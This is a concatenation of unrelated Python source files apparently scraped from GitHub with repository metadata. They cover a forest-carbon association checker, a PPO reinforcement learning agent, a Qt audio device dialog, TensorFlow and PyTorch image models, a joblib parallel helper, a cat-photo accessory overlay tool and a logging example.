def __init__(self, country):
# Default attributes #
self.country = country
# Automatically access paths based on a string of many subpaths #
self.paths = AutoPaths(self.country.data_dir, self.all_paths)
@property_cached
def aidb(self):
"""Shortcut to the AIDB."""
database = AccessDatabase(self.paths.aidb_eu_mdb)
database.convert_col_names_to_snake = True
return database
@property_cached
def calib(self):
"""Shortcut to the Calibration DB."""
database = AccessDatabase(self.paths.calibration_mdb)
database.convert_col_names_to_snake = True
return database
@property_cached
def df(self):
"""Load the CSV that is 'associations.csv'."""
self.paths.associations.must_exist()
return pandas.read_csv(str(self.paths.associations))
def key_to_rows(self, mapping_name):
"""
Here is an example call:
>>> self.key_to_rows('MapDisturbanceType')
{'10% commercial thinning': '10% Commercial thinning',
'Deforestation': 'Deforestation',
'Fire': 'Wild Fire',
'Generic 15%': 'generic 15% mortality',
'Generic 20%': 'generic 20% mortality',
'Generic 30%': 'generic 30% mortality',
'Spruce Beetle 2% mortality (Ice sleet)': 'Spruce Beetle 2% mortality'}
"""
query = "A == '%s'" % mapping_name
mapping = self.df.query(query).set_index('B')['C'].to_dict()
return mapping
def list_missing(self):
"""
A method to predict what errors the Standard Import Tool will throw
in advance, by checking the contents of the AIDB.
"""
# Print function #
def print_messages(default, names, key):
template = "%s - %s - '%s' missing from archive index database."
for name in names:
if name not in default:
                    print(template % (key, self.country.country_iso2, name))
# Admin boundaries #
default = set(self.aidb['tblAdminBoundaryDefault']['AdminBoundaryName'])
names = self.key_to_rows(self.keys[0]).values()
print_messages(default, names, self.keys[0])
# Eco boundaries #
default = set(self.aidb['tblEcoBoundaryDefault']['EcoBoundaryName'])
names = self.key_to_rows(self.keys[1]).values()
print_messages(default, names, self.keys[1])
# Species #
default = set(self.aidb['tblSpeciesTypeDefault']['SpeciesTypeName'])
names = self.key_to_rows(self.keys[2]).values()
print_messages(default, names, self.keys[2])
# Disturbances #
default = set(self.aidb['tblDisturbanceTypeDefault']['dist_type_name'])
names = self.key_to_rows(self.keys[3]).values()
print_messages(default, names, self.keys[3])
# Disturbances also have to match with disturbance_types.csv #
types = set(self.country.parent.csv_to_xls.read_csv('disturbance_types')['dist_desc_input'])
names = set(self.key_to_rows(self.keys[3]).keys())
unmatched = types ^ names
if unmatched:
            print('disturbance_types.csv - %s - %s ' % (self.country.country_iso2, unmatched))
# Non-forest #
default = set(self.aidb['tblAfforestationPreTypeDefault']['Name'])
names = self.key_to_rows(self.keys[4]).values()
print_messages(default, names, self.keys[4])
###############################################################################
if __name__ == '__main__':
checkers = [AssociationsChecker(c) for c in continent]
    for checker in tqdm(checkers): checker.list_missing()  # the class defines no __call__, so run the check explicitly
| xapple/cbmcfs3_runner | scripts/associations/check_associations.py | check_associations.py | py | 4,628 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "autopaths.auto_paths.AutoPaths",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "plumbing.databases.access_database.AccessDatabase",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "plumbing.cache.property_cached",
"line_number": 46,
"usa... |
16721355609 | import torch
import torch.nn.functional as F
from torch.distributions import Normal
from torch.utils.data.sampler import BatchSampler, SubsetRandomSampler
from torch.nn.utils import clip_grad_norm_
from PPO_Continuous.version2.Network import Actor, Critic
class PPO(object):
def __init__(self,
state_dim,
action_dim,
lr_a=0.001,
lr_c=0.001,
reward_decay=0.99,
memory_size=1000,
batch_size=32,
update_times=10,
clip_param=0.2,
max_grad_norm=0.5,
device='cpu'):
self.state_dim = state_dim
self.action_dim = action_dim
self.lr_a = lr_a
self.lr_c = lr_c
self.gamma = reward_decay
self.capacity = memory_size
self.batch_size = batch_size
self.update_times = update_times
self.clip_param = clip_param
self.max_grad_norm = max_grad_norm
self.device = device
self.ReplayBuffer = []
self.counter = 0
self.actor = Actor(self.state_dim, self.action_dim)
self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=self.lr_a)
self.critic = Critic(self.state_dim)
self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=self.lr_c)
self.counter = 0
self.training_step = 0
def choose_action(self, state):
state = torch.from_numpy(state).float().unsqueeze(0)
mu, sigma = self.actor(state)
dist = Normal(mu, sigma)
action = dist.sample()
action_log_prob = dist.log_prob(action)
action = action.clamp(-2, 2)
return action.item(), action_log_prob.item()
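    # Editor's note (added comment): the clamp to [-2, 2] above matches the torque
    # bounds of Gym's Pendulum environment, which this agent appears to target;
    # adjust the bounds for environments with a different continuous action range.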
def store_transition(self, transition):
self.ReplayBuffer.append(transition)
self.counter += 1
return self.counter % self.capacity == 0
def update(self):
old_state = torch.Tensor([t.state for t in self.ReplayBuffer]).float()
old_action = torch.Tensor([t.action for t in self.ReplayBuffer]).float().view(-1, 1)
reward = torch.Tensor([t.reward for t in self.ReplayBuffer]).float().view(-1, 1)
next_state = torch.Tensor([t.next_state for t in self.ReplayBuffer]).float()
old_action_log_prob = torch.Tensor([t.a_log_prob for t in self.ReplayBuffer]).float().view(-1, 1)
reward = (reward - reward.mean()) / (reward.std() + 1e-10)
with torch.no_grad():
gt = reward + self.gamma * self.critic(next_state)
for i in range(self.update_times):
for index in BatchSampler(SubsetRandomSampler(range(len(self.ReplayBuffer))), self.batch_size, False):
gt_value = gt[index].view(-1, 1)
value = self.critic(old_state[index])
advantage = (gt_value - value).detach()
mu, sigma = self.actor(old_state[index])
m = Normal(torch.squeeze(mu), torch.squeeze(sigma))
action_log_prob = m.log_prob(torch.squeeze(old_action[index])).view(-1, 1)
ratio = torch.exp(action_log_prob - old_action_log_prob[index])
surr1 = ratio * advantage
surr2 = torch.clamp(ratio, 1 - self.clip_param, 1 + self.clip_param) * advantage
action_loss = -torch.min(surr1, surr2).mean()
self.actor_optimizer.zero_grad()
action_loss.backward()
clip_grad_norm_(self.actor.parameters(), self.max_grad_norm)
self.actor_optimizer.step()
# update critic network
value_loss = F.mse_loss(gt_value, value)
self.critic_optimizer.zero_grad()
value_loss.backward()
clip_grad_norm_(self.critic.parameters(), self.max_grad_norm)
self.critic_optimizer.step()
self.training_step += 1
del self.ReplayBuffer[:]
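    # Editor's note (added comment, not part of the original file): store_transition and
    # update expect transition objects exposing .state, .action, .a_log_prob, .reward
    # and .next_state, e.g. a namedtuple defined by the caller (hypothetical):
    #   from collections import namedtuple
    #   Transition = namedtuple('Transition',
    #                           ['state', 'action', 'a_log_prob', 'reward', 'next_state'])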
| zhihangmuzi/deep-reinforcement-learning-with-pytorch | PPO_Continuous/version2/Agent.py | Agent.py | py | 3,981 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PPO_Continuous.version2.Network.Actor",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "torch.optim.Adam",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name"... |
12259799552 | from PySide2 import QtWidgets
import ui.devicesDialog_ui
import input.audio
class form(QtWidgets.QDialog, ui.devicesDialog_ui.Ui_Dialog):
def __init__(self):
super(form, self).__init__()
self.setupUi(self) #setup user interface
self.currentDevice = 0 #set default device
self.buttonBox.accepted.connect(self.btnOk_callback)
def show(self, audio: input.audio.audio):
self.lstDevices.clear()
for i in range (0, audio.getDeviceCount()):
devName = audio.getDeviceName(i)
if (devName != ""):
self.lstDevices.addItem(devName)
self.lstDevices.setCurrentRow(self.currentDevice)
super(form, self).show() #show dialog
self.activateWindow() #make sure window shows right away
def btnOk_callback(self):
self.currentDevice = self.lstDevices.currentRow()
def getCurrentDevice(self):
return self.currentDevice
| HamerKits/RoscoeQRSSViewer | devicesDialog.py | devicesDialog.py | py | 948 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PySide2.QtWidgets.QDialog",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "PySide2.QtWidgets",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "ui.devicesDialog_ui.devicesDialog_ui",
"line_number": 5,
"usage_type": "attribute"
},
... |
3270527178 | """
Model implementation.
"""
from helper import cache_func, INIT_METHODS
import tensorflow as tf
class CNNModel:
"""
CNN model implementation. Covers the implementations for both the large and the
compact network.
"""
def __init__(self, data, target, model_params, data_params):
self.data = data
self.target = target
self.params = model_params
self.data_params = data_params
# Weight initialization object arguments.
if self.params["weight_init"] == "gaussian":
init_args = {"mean": 0.0,
"stddev": 1}
else:
init_args = {}
if model_params["model_type"] == "large": # LargeNet Implementation.
self.num_layers = 9 # Number of conv. layers.
self.num_deep = 4 # Number of dense layers.
self.strides = [1, 1, 1, 1, 1, 1, 1, 1]
self.weight_dict = {"W_c_1": tf.compat.v1.get_variable(shape=(7, 7, self.data_params["input_dims"], 16),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_1"),
"b_c_1": tf.Variable(tf.zeros([16])),
"W_c_2": tf.compat.v1.get_variable(shape=(7, 7, 16, 16),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_2"),
"b_c_2": tf.Variable(tf.zeros([16])),
"W_c_3": tf.compat.v1.get_variable(shape=(5, 5, 16, 32),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_3"),
"b_c_3": tf.Variable(tf.zeros([32])),
"W_c_4": tf.compat.v1.get_variable(shape=(5, 5, 32, 32),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_4"),
"b_c_4": tf.Variable(tf.zeros([32])),
"W_c_5": tf.compat.v1.get_variable(shape=(5, 5, 32, 64),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_5"),
"b_c_5": tf.Variable(tf.zeros([64])),
"W_c_6": tf.compat.v1.get_variable(shape=(3, 3, 64, 128),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_6"),
"b_c_6": tf.Variable(tf.zeros([128])),
"W_c_7": tf.compat.v1.get_variable(shape=(3, 3, 128, 256),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_7"),
"b_c_7": tf.Variable(tf.zeros([256])),
"W_c_8": tf.compat.v1.get_variable(shape=(3, 3, 256, 512),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_8"),
"b_c_8": tf.Variable(tf.zeros([512])),
"W_1": tf.compat.v1.get_variable(shape=(34 ** 2 * 512, 512),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_1"),
"b_1": tf.Variable(tf.zeros([512])),
"W_2": tf.compat.v1.get_variable(shape=[512, 256],
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_2"),
"b_2": tf.Variable(tf.zeros([256])),
"W_3": tf.compat.v1.get_variable(shape=(256, 1),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_3"),
"b_3": tf.Variable(tf.zeros([1]))}
else: # Implementation of the compact network.
self.num_layers = 5
self.num_deep = 4
self.strides = [3, 1, 1, 1]
self.weight_dict = {"W_c_1": tf.compat.v1.get_variable(shape=(5, 5, self.data_params["input_dims"], 16),
initializer=INIT_METHODS[self.params["weight_init"]](
**init_args),
name="W_c_1"),
"b_c_1": tf.Variable(tf.zeros([16])),
"W_c_2": tf.compat.v1.get_variable(shape=(5, 5, 16, 32),
initializer=INIT_METHODS[self.params["weight_init"]](
**init_args),
name="W_c_2"),
"b_c_2": tf.Variable(tf.zeros([32])),
"W_c_3": tf.compat.v1.get_variable(shape=(3, 3, 32, 64),
initializer=INIT_METHODS[self.params["weight_init"]](
**init_args),
name="W_c_3"),
"b_c_3": tf.Variable(tf.zeros([64])),
"W_c_4": tf.compat.v1.get_variable(shape=(3, 3, 64, 128),
initializer=INIT_METHODS[self.params["weight_init"]](
**init_args),
name="W_c_4"),
"b_c_4": tf.Variable(tf.zeros([128])),
"W_1": tf.compat.v1.get_variable(shape=(10 ** 2 * 128, 1024),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_1"),
"b_1": tf.Variable(tf.zeros([1024])),
"W_2": tf.compat.v1.get_variable(shape=[1024, 256],
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_2"),
"b_2": tf.Variable(tf.zeros([256])),
"W_3": tf.compat.v1.get_variable(shape=(256, 1),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_3"),
"b_3": tf.Variable(tf.zeros([1]))}
for key, val in self.weight_dict.items(): # Rename the layers.
self.weight_dict[key] = tf.identity(self.weight_dict[key], name=key)
# Flag indicating whether the current session is training or prediction.
self.training = tf.compat.v1.placeholder(tf.bool, shape=[])
self.layer_out = None
self.convs = {}
self.biass = {}
self.activations = {}
self.pools = {}
self.weight = {"W_c_1": None}
self.densed = {}
self.biased = {}
self.activated = {}
self.dense_weights = {}
self.bias_weights = {}
self._loss = None
# Initialize the lazy properties.
_ = self.optimize
_ = self.eval_loss
self.epoch_counter = 0
@cache_func
def predict(self):
"""
Forward function for the models.
:return: Output of the model.
"""
for c in range(1, self.num_layers):
if c == 1:
input_ = self.data
self.weight["W_c_1"] = tf.transpose(self.weight_dict["W_c_1"], [3, 0, 1, 2])
else:
input_ = pool
conv = tf.nn.conv2d(input_, self.weight_dict[f"W_c_{c}"], self.strides[c-1], "VALID")
self.convs[c] = tf.transpose(conv, [3, 0, 1, 2])
bias = tf.nn.bias_add(conv, self.weight_dict[f"b_c_{c}"])
self.biass[c] = tf.transpose(bias, [3, 0, 1, 2])
if self.params["batch_norm"]:
bias = tf.compat.v1.layers.batch_normalization(bias, axis=-1, training=self.training,
momentum=0.7)
activation = tf.nn.relu(bias)
self.activations[c] = tf.transpose(activation, [3, 0, 1, 2])
pool = tf.nn.pool(activation, (3, 3),
"MAX", padding="VALID")
self.pools[c] = tf.transpose(pool, [3, 0, 1, 2])
flatten = tf.compat.v1.layers.flatten(pool, name=None, data_format='channels_last')
layer_out = flatten
for d in range(1, self.num_deep):
densed = tf.matmul(layer_out, self.weight_dict[f"W_{d}"],
transpose_a=False, transpose_b=False)
self.densed[d] = densed
self.dense_weights[d] = self.weight_dict[f"W_{d}"]
layer_out = densed + self.weight_dict[f"b_{d}"]
self.biased[d] = layer_out
self.bias_weights = self.weight_dict[f"b_{d}"]
if self.params["batch_norm"]:
layer_out = tf.compat.v1.layers.batch_normalization(layer_out, axis=-1, training=self.training,
momentum=0.7)
if d != self.num_deep - 1:
layer_out = tf.nn.relu(layer_out)
self.activated[d] = layer_out
if self.params["dropout"]:
layer_out = tf.cond(self.training, lambda: tf.nn.dropout(layer_out, self.params["keep_rate"]),
lambda: layer_out)
return layer_out
@cache_func
def optimize(self):
"""
One step optimization for the specified loss function.
:return: optimizer.
"""
loss = self.loss
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.params["learning_rate"],
beta1=0.8, beta2=0.8)
train_op = optimizer.minimize(loss)
return train_op
@cache_func
def loss(self):
"""
Overall loss function that contains the data loss and the regularization losses.
:return: Overall loss.
"""
self._loss = self.data_loss
if self.params["l2_loss"]:
self._loss += self.l2_loss
return self._loss
@cache_func
def data_loss(self):
"""
Data loss from the label predictions.
:return: data loss.
"""
if self.params["loss_type"] == "l1":
loss = tf.reduce_mean(tf.abs(tf.subtract(self.target, self.predict)))
elif self.params["loss_type"] == "l2":
loss = tf.reduce_mean(tf.pow(tf.subtract(self.target, self.predict), 2))
else:
loss = 0.0
return loss
@cache_func
def eval_loss(self):
"""
Evaluation loss, L1.
:return: evaluation loss.
"""
loss = tf.reduce_mean(tf.abs(tf.subtract(self.target, tf.math.round(self.predict))))
return loss
@cache_func
def l2_loss(self):
"""
L2 regularization loss.
:return: Regularization loss.
"""
l2_loss = 0.0
for key, val in self.weight_dict.items():
l2_loss += self.params["alpha"] * tf.nn.l2_loss(val)
return l2_loss
def evaluate(self):
"""
:return:
"""
return tf.reduce_mean(tf.abs(tf.subtract(self.target, tf.math.round(self.predict))))
| Oguzhanka/face_attractiveness | models/cnn_model.py | cnn_model.py | py | 13,191 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.compat.v1.get_variable",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "tensorflow.compat",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "helper.INIT_METHODS",
"line_number": 31,
"usage_type": "name"
},
{
"api_... |
31635729829 | import os
import torch
import torchvision
import random
import pandas as pd
import numpy as np
import torch.nn as nn
import matplotlib.pyplot as plt
from PIL import Image
import cv2
import torch.nn.functional as F
import torchvision.transforms as transforms
import torchvision.models as models
from torch.utils.data import Dataset, random_split, DataLoader
from torchvision.datasets import ImageFolder
from torchvision import models
from torch import optim
from torchsummary import summary
from math import atan2, degrees
class CatPicture():
def __init__(self, filename):
self.which_p = 1
self.which_d = 1
self.wear_list = [0, 0, 0]
self.ori_filename = filename
tmp_idx = filename.rfind(".")
self.short_filename = filename[:tmp_idx]
def resize_img(im):
old_size = im.shape[:2] # old_size is in (height, width) format
ratio = float(img_size) / max(old_size)
new_size = tuple([int(x * ratio) for x in old_size])
# new_size should be in (width, height) format
im = cv2.resize(im, (new_size[1], new_size[0]))
delta_w = img_size - new_size[1]
delta_h = img_size - new_size[0]
top, bottom = delta_h // 2, delta_h - (delta_h // 2)
left, right = delta_w // 2, delta_w - (delta_w // 2)
new_im = cv2.copyMakeBorder(im, top, bottom, left, right, cv2.BORDER_CONSTANT,
value=[0, 0, 0])
return new_im, ratio, top, left
class CatDataset(Dataset):
def __init__(self, images, labels, transform):
self.imgs = images
self.labels = labels
self.transform = transform
def __len__(self):
return len(self.imgs) # return DataSet 長度
def __getitem__(self, idx):
image = self.imgs[idx]
image = image[..., ::-1].copy()
image = self.transform(image)
label = np.array(self.labels[idx])
return image, label # return 模型訓練所需的資訊
def Catface_dataloader(img):
test_inputs = []
test_inputs.append(img)
test_labels = [0 for i in range(4)]
test_dataloader = DataLoader(CatDataset(test_inputs, test_labels, test_transformer),
batch_size=1, shuffle=False)
return test_dataloader
def Lmks_dataloader(img):
test_inputs = []
test_inputs.append(img)
test_labels = [0 for i in range(18)]
test_dataloader = DataLoader(CatDataset(test_inputs, test_labels, test_transformer),
batch_size=1, shuffle=False)
return test_dataloader
class CatFaceModule(nn.Module):
def __init__(self):
super(CatFaceModule, self).__init__()
v = torch.hub.load('pytorch/vision:v0.6.0',
'mobilenet_v2', pretrained=True)
v.classifier[1] = nn.Linear(v.last_channel, 4)
self.layer1 = v
def forward(self, x):
out = self.layer1(x)
return out
class LmksModule(nn.Module):
def __init__(self):
super(LmksModule, self).__init__()
v = torch.hub.load('pytorch/vision:v0.6.0',
'mobilenet_v2', pretrained=True)
v.classifier[1] = nn.Linear(v.last_channel, 18)
self.layer1 = v
def forward(self, x):
out = self.layer1(x)
return out
# main program
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
img_size = 224
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
test_transformer = transforms.Compose([
transforms.ToTensor(),
normalize
])
# the path of models
cat_face_model_path = "mobilenet_RMSELoss500.ph"
lmks_model_path = "mobilenet_RMSELoss100_36.ph"
# load the models
cat_model = CatFaceModule().to(device)
cat_model.load_state_dict(torch.load(cat_face_model_path))
cat_model.eval()
lmks_model = LmksModule().to(device)
lmks_model.load_state_dict(torch.load(lmks_model_path))
lmks_model.eval()
# the path of the image you want to test
img_path = filename
# read the image
img = cv2.imread(img_path)
ori_img = img.copy()
result_img = img.copy()
img, ratio, top, left = resize_img(img)
# plt.figure()
# plt.imshow(img)
predicted = []
# catface predicted
catface_dataloader = Catface_dataloader(img)
for i, (x, label) in enumerate(catface_dataloader):
with torch.no_grad():
x, label = x.to(device), label.to(device)
output = cat_model(x)
# loss = criterion(output, label.long())
predicted = output.data[0].reshape((-1, 2))
# the position of the cat face box
pre_bb = predicted.cpu().numpy()
# print(pre_bb)
        # the position of the cat face box in the original image
        ori_bb = ((pre_bb - np.array([left, top])) / ratio).astype(int)
# print(ori_bb)
# cut the face image
center = np.mean(ori_bb, axis=0)
face_size = max(np.abs(ori_bb[1] - ori_bb[0]))
        new_bb = np.array([
            center - face_size * 0.6,
            center + face_size * 0.6
        ]).astype(int)  # np.int was removed from NumPy; the builtin int is equivalent here
new_bb = np.clip(new_bb, 0, 99999)
face_img = ori_img[new_bb[0][1]:new_bb[1]
[1], new_bb[0][0]:new_bb[1][0]]
# plt.figure()
# plt.imshow(face_img)
face_img, face_ratio, face_top, face_left = resize_img(face_img)
# landmark prediction
lmks_dataloader = Lmks_dataloader(face_img)
for i, (x, label) in enumerate(lmks_dataloader):
with torch.no_grad():
x, label = x.to(device), label.to(device)
output = lmks_model(x)
# loss = criterion(output, label.long()) # 計算測試資料的準確度
predicted = output.data[0].reshape((-1, 2))
pred_lmks = predicted.cpu().numpy()
# print(pred_lmks)
        new_lmks = (
            (pred_lmks - np.array([face_left, face_top])) / face_ratio).astype(int)
self.ori_lmks = new_lmks + new_bb[0]
ori_img = cv2.cvtColor(ori_img, cv2.COLOR_BGR2RGB)
# initial cat
self.ori_pic = result_img
tmp_filename = self.short_filename + "_000.jpg"
cv2.imwrite(tmp_filename, result_img)
# main end
def angle_between(self, p1, p2):
xDiff = p2[0] - p1[0]
yDiff = p2[1] - p1[1]
return degrees(atan2(yDiff, xDiff))
def overlay_transparent(self, background_img, img_to_overlay_t, x, y, overlay_size=None):
bg_img = background_img.copy()
# convert 3 channels to 4 channels
if bg_img.shape[2] == 3:
bg_img = cv2.cvtColor(bg_img, cv2.COLOR_BGR2BGRA)
if overlay_size is not None:
img_to_overlay_t = cv2.resize(
img_to_overlay_t.copy(), overlay_size)
b, g, r, a = cv2.split(img_to_overlay_t)
for i in range(len(a)):
for j in range(len(a[0])):
if a[i][j] < 200:
a[i][j] = 0
#mask = cv2.medianBlur(a, 5)
mask = a
h, w, _ = img_to_overlay_t.shape
roi = bg_img[int(y - h / 2):int(y + h / 2),
int(x - w / 2):int(x + w / 2)]
img1_bg = cv2.bitwise_and(roi.copy(), roi.copy(),
mask=cv2.bitwise_not(mask))
img2_fg = cv2.bitwise_and(
img_to_overlay_t, img_to_overlay_t, mask=mask)
bg_img[int(y - h / 2):int(y + h / 2), int(x - w / 2) :int(x + w / 2)] = cv2.add(img1_bg, img2_fg)
# convert 4 channels to 4 channels
bg_img = cv2.cvtColor(bg_img, cv2.COLOR_BGRA2BGR)
return bg_img
def setWearList(self, which_pattern):
self.wear_list[self.which_d] = which_pattern
def CreateBasePic(self):
tmp_list = self.wear_list[:]
tmp_list[self.which_d] = 0
base_filepath = self.short_filename + "_" + \
str(tmp_list[0]) + str(tmp_list[1]) + str(tmp_list[2]) + ".jpg"
if os.path.isfile(base_filepath):
return
self.WearHat(tmp_list[0], 0, 0)
self.WearBow(tmp_list[0], tmp_list[1], 0)
self.WearGlasses(tmp_list[0], tmp_list[1], tmp_list[2])
def WearDecorate(self):
self.CreateBasePic()
if self.which_d == 0:
self.WearHat(self.wear_list[0],
self.wear_list[1], self.wear_list[2])
elif self.which_d == 1:
self.WearBow(self.wear_list[0],
self.wear_list[1], self.wear_list[2])
else:
self.WearGlasses(self.wear_list[0],
self.wear_list[1], self.wear_list[2])
new_name = self.short_filename + "_" + \
str(self.wear_list[0]) + str(self.wear_list[1]
) + str(self.wear_list[2]) + ".jpg"
return new_name
def WearHat(self, h_n, b_n, g_n):
if h_n == 0:
return
# add hat
hat_name = "hat" + str(h_n) + ".png"
hat = cv2.imread(hat_name, cv2.IMREAD_UNCHANGED)
hat_center = np.mean([self.ori_lmks[5], self.ori_lmks[6]], axis=0)
hat_size = np.linalg.norm(self.ori_lmks[5] - self.ori_lmks[6]) * 3
angle = -self.angle_between(self.ori_lmks[5], self.ori_lmks[6])
M = cv2.getRotationMatrix2D(
(hat.shape[1] / 2, hat.shape[0] / 2), angle, 1)
rotated_hat = cv2.warpAffine(hat, M, (hat.shape[1], hat.shape[0]))
base_name = self.short_filename + "_" + \
"0" + str(b_n) + str(g_n) + ".jpg"
new_name = self.short_filename + "_" + \
str(h_n) + str(b_n) + str(g_n) + ".jpg"
base_pic = cv2.imread(base_name)
        try:
            cat = self.overlay_transparent(base_pic, rotated_hat, hat_center[0], hat_center[1], overlay_size=(
                int(hat_size), int(hat.shape[0] * hat_size / hat.shape[1])))
        except Exception:
            # Without this early return, `cat` would be undefined in the write below
            print('failed overlay image')
            return
        cv2.imwrite(new_name, cat)
def WearBow(self, h_n, b_n, g_n):
if b_n == 0:
return
# add bow
bow_name = "bow" + str(b_n) + ".png"
bow = cv2.imread(bow_name, cv2.IMREAD_UNCHANGED)
bow_center = np.mean([self.ori_lmks[3], self.ori_lmks[5]], axis=0)
bow_size = np.linalg.norm(self.ori_lmks[3] - self.ori_lmks[5]) * 1.5
angle = -self.angle_between(self.ori_lmks[3], self.ori_lmks[5])
M = cv2.getRotationMatrix2D(
(bow.shape[1] / 2, bow.shape[0] / 2), angle, 1)
rotated_bow = cv2.warpAffine(bow, M, (bow.shape[1], bow.shape[0]))
base_name = self.short_filename + "_" + \
str(h_n) + "0" + str(g_n) + ".jpg"
new_name = self.short_filename + "_" + \
str(h_n) + str(b_n) + str(g_n) + ".jpg"
base_pic = cv2.imread(base_name)
cat = self.overlay_transparent(base_pic, rotated_bow, bow_center[0], bow_center[1], overlay_size=(
int(bow_size), int(bow.shape[0] * bow_size / bow.shape[1])))
cv2.imwrite(new_name, cat)
def WearGlasses(self, h_n, b_n, g_n):
# add glasses
if g_n == 0:
return
glasses_name = "glasses" + str(g_n) + ".png"
glasses = cv2.imread(glasses_name, cv2.IMREAD_UNCHANGED)
glasses_center = np.mean([self.ori_lmks[0], self.ori_lmks[1]], axis=0)
glasses_size = np.linalg.norm(
self.ori_lmks[0] - self.ori_lmks[1]) * 2.5
angle = -self.angle_between(self.ori_lmks[0], self.ori_lmks[1])
M = cv2.getRotationMatrix2D(
(glasses.shape[1] / 2, glasses.shape[0] / 2), angle, 1)
rotated_glasses = cv2.warpAffine(
glasses, M, (glasses.shape[1], glasses.shape[0]))
base_name = self.short_filename + "_" + \
str(h_n) + str(b_n) + "0" + ".jpg"
new_name = self.short_filename + "_" + \
str(h_n) + str(b_n) + str(g_n) + ".jpg"
base_pic = cv2.imread(base_name)
cat = self.overlay_transparent(base_pic, rotated_glasses, glasses_center[0], glasses_center[1], overlay_size=(
int(glasses_size), int(glasses.shape[0] * glasses_size / glasses.shape[1])))
cv2.imwrite(new_name, cat)
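# Illustrative usage sketch (not part of the original file; "cat.jpg" and the
# decoration indices are placeholders): face and landmark detection run in
# __init__, then the chosen accessory is composited and the new path returned.
if __name__ == "__main__":
    cat = CatPicture("cat.jpg")   # runs face + landmark detection on the photo
    cat.which_d = 0               # 0 = hat, 1 = bow, 2 = glasses
    cat.setWearList(1)            # use pattern #1 of the selected decoration
    print("saved:", cat.WearDecorate())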
| a20815579/cat_face_detection | cat_CNN.py | cat_CNN.py | py | 13,278 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "cv2.resize",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "cv2.copyMakeBorder",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "cv2.BORDER_CONSTANT",
"line_number": 47,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.da... |
21848108182 | import numpy as np
from joblib import Parallel, delayed  # sklearn.externals.joblib was removed; import joblib directly
from multiprocessing import cpu_count
def apply_parallel_joblib(func, data, *args, chunk=None, overlap=10,
n_jobs=None, **kwargs):
"""
Apply a function in parallel to overlapping chunks of an array
Parameters
----------
func : function
name of function. Its first argument needs to be ``data``
data : ndarray
data to be chunked
    chunk : int
        chunk size (defaults to ``len(data) // cpu_count()`` when not given)
overlap : int
size of overlap between consecutive chunks
n_jobs : int
number of jobs to be used by joblib for parallel processing
*args, **kwargs : other arguments to be passed to func
Examples
--------
>>> from skimage import data, filters
>>> coins = data.coins()
>>> res = apply_parallel_joblib(filters.gaussian, coins, 2)
"""
if chunk is None:
        n = len(data)
        try:
            ncpu = cpu_count()
        except NotImplementedError:
            ncpu = 4
        chunk = n // ncpu
if n_jobs is None:
n_jobs = -1
sh0 = data.shape[0]
nb_chunks = sh0 // chunk
end_chunk = sh0 % chunk
arg_list = [data[max(0, i*chunk - overlap):
min((i+1)*chunk + overlap, sh0)]
for i in range(0, nb_chunks)]
if end_chunk > 0:
arg_list.append(data[-end_chunk - overlap:])
res_list = Parallel(n_jobs=n_jobs, backend="threading")(delayed(func)
(sub_im, *args, **kwargs) for sub_im in arg_list)
output_dtype = res_list[0].dtype
out_data = np.empty(data.shape, dtype=output_dtype)
for i in range(1, nb_chunks):
out_data[i*chunk:(i+1)*chunk] = res_list[i][overlap:overlap+chunk]
out_data[:chunk] = res_list[0][:-overlap]
    if end_chunk > 0:
out_data[-end_chunk:] = res_list[-1][overlap:]
return out_data
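# Illustrative usage sketch (not part of the original module; requires
# scikit-image): mirrors the docstring example by smoothing the `coins`
# sample image in overlapping chunks, forwarding sigma=2 to filters.gaussian.
if __name__ == "__main__":
    from skimage import data, filters

    coins = data.coins()
    blurred = apply_parallel_joblib(filters.gaussian, coins, 2,
                                    chunk=64, overlap=10)
    print(blurred.shape, blurred.dtype)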
| emmanuelle/skimage-sprint | chunk_joblib.py | chunk_joblib.py | py | 1,921 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "multiprocessing.cpu_count",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "sklearn.externals.joblib.Parallel",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "sklearn.externals.joblib.delayed",
"line_number": 57,
"usage_type": "call"
... |
24396409804 | import logging
logger = logging.getLogger(__name__)
def do_something():
logger.debug(
'Detailed information, typically of interest only when diagnosing problems.')
logger.info('Confirmation that things are working as expected.')
logger.warning(
'An indication that something unexpected happened. The software is still working as expected.')
logger.error(
'Due to a more serious problem, the software has not been able to perform some function.')
